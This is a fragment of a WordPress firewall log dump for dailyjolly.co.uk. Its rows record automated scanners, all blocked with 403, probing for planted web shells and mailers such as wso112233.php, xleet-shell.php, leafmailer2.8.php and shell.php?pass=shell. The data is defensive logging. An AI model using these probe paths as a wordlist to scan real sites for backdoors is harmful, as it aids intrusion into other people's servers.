3.5.30729)\"}','LQo8cUZg1DpCNG6MnXibtkS0',0,1674100055.2462,287,'','GET',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.dailyjolly.co.uk/zet.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','YKlIj9Um5dNnZtMXEPicH2Lw',0,1674100300.4712,273,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.sts.php','','{\"1\":\"python-requests\\/2.28.1\"}','UWn2ctIgfOT1RM8pod6qyxLN',0,1674107725.2227,289,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.Wp-back.phP','','{\"1\":\"python-requests\\/2.28.1\"}','FCHGpvJzQfYX5gRWxbm3rU17',0,1674107927.0855,335,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/fx.php','','{\"1\":\"python-requests\\/2.28.1\"}','Vwxt7mMaC8g30XiUH5OvlKey',0,1674108081.7140,307,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','tmehuG4LNZoUSXgTrB5Pbv9w',0,1674108184.4710,228,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php','','{\"1\":\"python-requests\\/2.28.1\"}','iQ57KZouY2yFTxnwa6erlD0J',0,1674108275.3912,320,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wso112233.php','','{\"1\":\"python-requests\\/2.28.1\"}','USfKEVjgbvdqw2ZArm0ou39y',0,1674108320.1696,193,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/bala.php','','{\"1\":\"python-requests\\/2.28.1\"}','aEqft7SWIbeYD5N1wjPK9ukc',0,1674108348.5677,186,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','NHbI4cMAlhGD9X3K5FRmiOzs',0,1674108390.1063,199,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','JUp9jEKQVr3TuRqkwW0v45AH',0,1674108444.8900,225,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','SeyDA2WvGjJlwoYtkL8VCmRp',0,1674108527.5839,210,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','1GNnzFM3yqrglR6KB5ujoSJL',0,1674108627.9457,205,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','HNSBUyQ3d0gb4vOpDZ2tMm5L',0,1674108711.0207,246,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','phuZGoSX7I04kTfNztaDBAVE',0,1674108816.9910,213,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','Lbf8JqS1r0KzI9WN2wpRnUPt',0,1674108924.4009,206,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','iIXRCmeSPThZ31vbA5UMpnLY',0,1674109048.1451,200,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','k6Bi94fyEI3qaTLoUY8GnPsO',0,1674109082.8102,267,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tGzF2Z8joUIiJNfyp6mVBcsK',0,1674109083.3546,180,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1A3Np0hvZgV8ebcW4tLHPD6m',0,1674109083.7936,181,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NDxXsyecdk8OUuA0IFhtlWKV',0,1674109084.2454,277,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DNTC5d4wbSIa3vmKHtlsEMV2',0,1674109084.7754,197,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/wp-content/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EqZ6VXekTY2APnsFuJQ517Ot',0,1674109085.2620,175,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/wp-admin/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ICjXZJzk8rpnlRFxW2yNAtDw',0,1674109085.6953,196,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/wp-includes/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NQTI6Bb01rzfMolRKenLY7wp',0,1674109086.3201,200,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','I28t1m6iTzRAUEeY49BpQL0w',0,1674109188.3747,237,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','w95NhbtkqgaOBrCU81VPRJdQ',0,1674109302.5943,235,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','20iu4Q9bdmvfFOMwGVDznLJh',0,1674109423.2619,226,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/p.php','','{\"1\":\"python-requests\\/2.28.1\"}','8fWTASskhdZCU6JOw3lE05at',0,1674109544.7197,223,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/t.php','','{\"1\":\"python-requests\\/2.28.1\"}','uLVIxiaOc0sfPRlqHn2eYpBw',0,1674109646.9257,318,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','y0fxX4cAKNda8521noz9uMJD',0,1674109773.3403,311,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"python-requests\\/2.28.1\"}','F3kJ9HwUqTgfLxc4SORM2mN1',0,1674109842.2854,196,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/confiig.php','','{\"1\":\"python-requests\\/2.28.1\"}','RdDA1ZvpPCrhWEfMeut8IQ9S',0,1674109896.8351,280,'','GET',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.dailyjolly.co.uk/xleet-shell.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','mtYA0dDcW9vsS5VJIGyOBq34',0,1674117392.8692,224,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2YxbLrkovcyAOfWjqCpiUtJX',0,1674118953.3273,336,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7sBFilRUn6z0Cyce2fTbKvVE',0,1674118954.4642,192,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AqKDFmdQ84O9aLn6lZzVHbpM',0,1674118955.4127,171,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PgmNtI6Cc9ZGdRjbLzUruSnT',0,1674118956.3524,177,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-conetnt/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ziv2XD6mjLF1qWVafHrOeYIM',0,1674118957.3395,177,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-admin/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RXVFATKNDUPJn9cMkZCeQLxH',0,1674118958.3289,188,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2FEQjGUJTgdbxlL4c5MzPCWk',0,1674118959.2798,199,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AcCuzrHjVm5IOqv0QXiW9hoS',0,1674118960.2711,208,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nWMiAsbdlVQOhuFNZc36kGvJ',0,1674118961.2414,189,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leaf-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x2Cucw7eHBK5NAnbfMUpyQsZ',0,1674118962.2060,161,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cGn2shIwK8e1NTgMpmyBX7ba',0,1674118963.1237,180,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','S67ci2XHM03smIbDBAkv58YK',0,1674118964.0775,168,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CdXatTIP7oy8h9MBuKNREf3Q',0,1674118965.0198,168,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wm1vRUBshlF8TNt4fjQSx92W',0,1674118966.0055,182,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.tmb/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K5BwJYmhebyEaNGQA6DU9C8g',0,1674118966.9979,156,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qck6eZaw94NbHCyPdYgm0LI3',0,1674118967.9280,160,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iOoZ5zdA3ElbcsBVgfnxS9kh',0,1674118968.8791,176,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7kx1mRB5SZQdoPs60qcWIw4G',0,1674118969.8379,170,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yquZaIsRYFf0n2gpJDWNtMAh',0,1674118970.7742,182,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yIJ3MWuisNxjOAYl8P95t0rT',0,1674118971.7198,181,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PyQLMcV6W9RszHFEu17JOBxC',0,1674118972.6618,231,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nfHG937Ve2qKRtY5rPxbEkNg',0,1674118973.6832,184,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KALMRU4YoXSarg2BmDZyNkd8',0,1674118974.6394,172,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/28.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5ROaviWlLJQm4tNeYDwk7AfF',0,1674118975.5767,165,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.Wp-maiiler.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VWxgSGQowh6OdYF4cTIuJRHM',0,1674118976.4928,189,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3Va7Q9YrUn1cWuqEgCRyoINA',0,1674118977.4448,190,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OqXCl7fb6V9t8AP2cu4YBL30',0,1674118978.3896,160,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-maiiler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y17wc8ZomQSHbhPldR59eOWK',0,1674118979.3202,189,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZjepbNXviYK7QrmfxAzkusR5',0,1674118980.4419,180,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.Wp-maiiler.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0zdt68N4sJXpHfenaBhCwLmP',0,1674118981.3797,191,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LnzRcQ0p6NDE9hCBVfgIjS53',0,1674118982.3262,187,'','GET',403,0,700,0,1,'',0),('168.100.162.235',2825167595,'','https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozila\\/5.0\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/ioptimization\\/IOptimize.php?rchk\"}','Dbwx8YHrlyg0G7MEV4ORhUaf',0,1674119390.3402,210,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/shx.php','','{\"1\":\"python-requests\\/2.28.2\"}','IaLt1coVlpvHA5Yk8yKq4gXE',0,1674121589.5107,230,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','pTgCyXUPFk7qGL1sai9jSWJE',0,1674121593.6362,291,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/small.php','','{\"1\":\"python-requests\\/2.28.2\"}','g4UxYl5AdOaBEPQnMR0Xhjze',0,1674121633.7019,290,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"python-requests\\/2.28.2\"}','4RUT0G7xSzBPCumydkKalhg5',0,1674121633.7279,275,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/0byte.php','','{\"1\":\"python-requests\\/2.28.2\"}','iZd2j1SybcHkeMIg4aNuTrYU',0,1674121633.7721,234,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-class.php','','{\"1\":\"python-requests\\/2.28.2\"}','mIeo0QujAdrB3D8k7VHcbLCz',0,1674121633.7620,301,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/ne.php','','{\"1\":\"python-requests\\/2.28.2\"}','6igs8Ujd7wKJ4VQRoPEMOZqz',0,1674121633.8059,299,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/admin.php','','{\"1\":\"python-requests\\/2.28.2\"}','5DPyHs0JmSLhOYx29eXzfBF6',0,1674121633.7921,319,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.2\"}','NImTG6A7rFMHjUgbnXRvpesQ',0,1674121634.0170,308,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/fw.php','','{\"1\":\"python-requests\\/2.28.2\"}','uVaLXM4QOyWbBsAC1NfoGwSH',0,1674121634.0194,475,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','qRbafQdvmuzn4eytVAX57g1P',0,1674121634.6893,318,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','zKqa5wJITEvcnF0COBfGPjVA',0,1674121635.6923,203,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/ne.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8fUIV01pgiNwxLGuEnkC3Rlh',0,1674121635.8061,197,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','d1zW8x5UZKlSvVEh2HP6tsDj',0,1674121636.2836,215,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','pRA4jQeOUoNyfSaI31Htszbv',0,1674121636.4579,220,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','7HjvRNBsEoe3SMuiYIphK5Qq',0,1674121637.6193,193,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jrAhgkbaqQePfvG9m1ELJdwt',0,1674121638.3049,195,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jxBh0lVSyI4J9sewnHC5Qif8',0,1674121638.8069,226,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.2\"}','OcnJsXlkvoKdB7tF1VbTfaxj',0,1674121645.5895,423,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/fox.php','','{\"1\":\"python-requests\\/2.28.2\"}','yaUp5X7cgBFrEqRI8zH2jAws',0,1674121645.5339,492,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/blog.php','','{\"1\":\"python-requests\\/2.28.2\"}','M9RphSADuKcjfsmPtQiFNHek',0,1674121645.7679,369,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.28.2\"}','oMf6Y7aWOyQZPLe9qiDhUAtr',0,1674121645.7600,492,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.2\"}','RKxzoIOYB8Ge0yq4tpSdnvVU',0,1674121645.8840,457,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/ff.php?pass=shell','','{\"1\":\"python-requests\\/2.28.2\"}','ZHFwyNpi9KBdORmCJW72jSqA',0,1674121645.8131,640,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/sym403.php','','{\"1\":\"python-requests\\/2.28.2\"}','a0gA3ivDn8W2CG7SQ4TYq6sr',0,1674121645.9360,518,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.28.2\"}','zguQ5HNM1eBUbaJrFDlAOhtv',0,1674121646.0267,478,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/z.php','','{\"1\":\"python-requests\\/2.28.2\"}','KjMIOk1a5z8sLF24XBt3Eyif',0,1674121646.0074,555,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/x.php','','{\"1\":\"python-requests\\/2.28.2\"}','gWJuybiBQ6Tm8rsIUzPtvSpV',0,1674121646.1362,428,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/.cgi/cache/index.php','','{\"1\":\"python-requests\\/2.28.2\"}','vmnbV2DHyNcjiKslzY9IRaWM',0,1674121646.1566,439,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.28.2\"}','IiD5NM48PZFeR1Tf6JOylnWH',0,1674121646.0900,515,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/test/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.2\"}','DmAUEirdOuVtaWP2sekTHn9Y',0,1674121645.9063,724,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/indeeex.php','','{\"1\":\"python-requests\\/2.28.2\"}','8QRr4I9Hj7LwlAkUcxYOJqBF',0,1674121646.1422,541,'','GET',403,0,700,0